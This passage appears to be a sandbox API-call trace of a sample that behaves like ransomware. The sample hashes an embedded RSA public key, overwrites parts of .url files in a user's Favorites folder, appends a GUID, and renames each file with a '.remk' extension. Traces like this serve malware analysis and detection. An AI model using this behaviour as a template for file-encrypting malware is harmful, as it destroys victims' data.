KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0233.767] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f6) returned 0x325fb40 [0233.767] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0233.767] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0233.767] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x694398) returned 1 [0233.768] CryptCreateHash (in: hProv=0x694398, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0233.768] CryptHashData (hHash=0x31de170, pbData=0x325fb40, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0233.768] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0233.768] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x31a0f08 [0233.768] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0233.768] GetLastError () returned 0x0 [0233.768] CryptDestroyHash (hHash=0x31de170) returned 1 [0233.768] CryptReleaseContext (hProv=0x694398, dwFlags=0x0) returned 1 [0233.768] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fb40 | out: hHeap=0x630000) returned 1 [0233.768] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0233.768] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0233.768] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0233.768] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0233.768] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0233.768] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0233.768] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xf0) returned 0x3192918 [0233.769] SetFilePointer (in: hFile=0x640, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0233.769] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a90 | out: hHeap=0x630000) returned 1 [0233.769] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x325fb40 [0233.769] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0233.769] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x325fd48 [0233.769] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6930 [0233.769] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x37bba08 [0233.769] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee478 [0233.769] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x37bba50 [0233.769] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee490 [0233.769] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee4c0 [0233.769] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee520 [0233.769] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee4d8 [0233.769] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x31ec670 [0233.769] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x31f7b30 [0233.769] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1b88 [0233.769] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x37b5b70 [0233.769] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee4c0 | out: hHeap=0x630000) returned 1 [0233.770] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee4d8 | out: hHeap=0x630000) returned 1 [0233.770] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee520 | out: hHeap=0x630000) returned 1 [0233.770] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ec670 | out: hHeap=0x630000) returned 1 [0233.770] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0233.770] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee520 [0233.770] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72ff00 [0233.770] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x31ee4d8 [0233.770] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0ee8 [0233.770] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x31ee4c0 [0233.770] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fea0 [0233.770] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x65dd10 [0233.770] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0233.770] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6990 [0233.770] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f08 [0233.770] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x31f6b30 [0233.770] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f28 [0233.770] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0233.770] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65dd10 | out: hHeap=0x630000) returned 1 [0233.770] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee4d8 | out: hHeap=0x630000) returned 1 [0233.770] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0233.770] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee4c0 | out: hHeap=0x630000) returned 1 [0233.770] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ee8 | out: hHeap=0x630000) returned 1 [0233.770] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0233.771] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee520 | out: hHeap=0x630000) returned 1 [0233.771] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0233.771] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d6930 | out: hHeap=0x630000) returned 1 [0233.771] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b1b88 | out: hHeap=0x630000) returned 1 [0233.771] GetCurrentThreadId () returned 0x314 [0233.771] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x65dd10 [0233.771] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0xec, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0233.771] WriteFile (in: hFile=0x640, lpBuffer=0x65dd10*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x65dd10*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0233.772] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65dd10 | out: hHeap=0x630000) returned 1 [0233.772] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0233.772] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0233.772] CloseHandle (hObject=0x640) returned 1 [0233.773] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Suggested Sites.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\suggested sites.url"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Suggested Sites.url.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\suggested sites.url.remk")) returned 1 [0233.774] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0233.774] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0233.774] VirtualFree (lpAddress=0x3c20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0233.776] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e698 | out: hHeap=0x630000) returned 1 [0233.776] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d9517a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0xe2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Web Slice Gallery.url", cAlternateFileName="WEBSLI~1.URL")) returned 1 [0233.776] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Web Slice Gallery.url") returned=".url" [0233.776] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Web Slice Gallery.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\web slice gallery.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0233.776] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=226) returned 1 [0233.776] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0233.779] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0xbc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0233.779] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0233.781] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0xe2, lpOverlapped=0x0) returned 1 [0233.781] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0233.781] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0233.781] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0233.781] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x694398) returned 1 [0233.782] CryptCreateHash (in: hProv=0x694398, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0233.782] CryptHashData (hHash=0x31de170, pbData=0x325fb40, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0233.782] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0233.782] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0233.782] GetLastError () returned 0x0 [0233.782] CryptDestroyHash (hHash=0x31de170) returned 1 [0233.782] CryptReleaseContext (hProv=0x694398, dwFlags=0x0) returned 1 [0233.782] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fb40 | out: hHeap=0x630000) returned 1 [0233.782] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0233.782] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0233.782] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0233.782] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0233.783] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1b88 [0233.783] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x37b5b70 [0233.783] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee4d8 | out: hHeap=0x630000) returned 1 [0233.783] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee4f0 | out: hHeap=0x630000) returned 1 [0233.783] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee538 | out: hHeap=0x630000) returned 1 [0233.783] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ec670 | out: hHeap=0x630000) returned 1 [0233.783] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0233.783] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee538 [0233.783] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fee0 [0233.783] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x31ee4f0 [0233.783] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0f28 [0233.783] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x31ee4d8 [0233.783] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fea0 [0233.783] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x3192918 [0233.783] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0233.783] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6930 [0233.783] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f08 [0233.783] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x31f6b30 [0233.783] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ee8 [0233.783] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72feb0 [0233.783] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3192918 | out: hHeap=0x630000) returned 1 [0233.784] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee4f0 | out: hHeap=0x630000) returned 1 [0233.784] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0233.784] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee4d8 | out: hHeap=0x630000) returned 1 [0233.784] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f28 | out: hHeap=0x630000) returned 1 [0233.784] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0233.784] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee538 | out: hHeap=0x630000) returned 1 [0233.784] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0233.784] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d6990 | out: hHeap=0x630000) returned 1 [0233.784] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b1b88 | out: hHeap=0x630000) returned 1 [0233.784] GetCurrentThreadId () returned 0x314 [0233.784] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x3192918 [0233.784] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x37ba280 [0233.784] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x31a8ac8 [0233.784] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x694398 [0233.784] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x37bddc8 [0233.784] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0233.784] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fea0 [0233.784] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x65dd10 [0233.784] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0233.784] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0233.784] GetCurrentThreadId () returned 0x314 [0233.784] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0233.785] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0233.785] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x6a7330 [0233.785] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0233.785] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0233.785] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0233.785] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0233.785] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6a7330 | out: hHeap=0x630000) returned 1 [0233.785] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x6a7330 [0233.785] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0233.785] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x31b5808 [0233.785] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0233.785] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x3195950 [0233.785] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0233.785] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee538 [0233.785] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0233.785] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0233.785] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0233.785] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed28 [0233.785] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed18 [0233.785] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f758 [0233.785] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f768 [0233.785] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f778 [0233.786] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee4d8 [0233.786] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0233.786] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fec0 [0233.786] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0233.786] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0233.786] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f788 [0233.786] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f798 [0233.786] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f7a8 [0233.786] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee4f0 [0233.786] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f798 | out: hHeap=0x630000) returned 1 [0233.786] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f28 [0233.786] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f788 | out: hHeap=0x630000) returned 1 [0233.786] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee4c0 [0233.786] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f7a8 | out: hHeap=0x630000) returned 1 [0233.786] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee550 [0233.786] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0233.786] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72ff00 [0233.786] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f768 | out: hHeap=0x630000) returned 1 [0233.786] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee520 [0233.786] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0233.786] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee508 [0233.786] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed28 | out: hHeap=0x630000) returned 1 [0233.787] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x31ee568 [0233.787] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee508 | out: hHeap=0x630000) returned 1 [0233.787] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x31ee508 [0233.787] HeapFree (in: hHeap=0x630000, dwFlags=0x0, 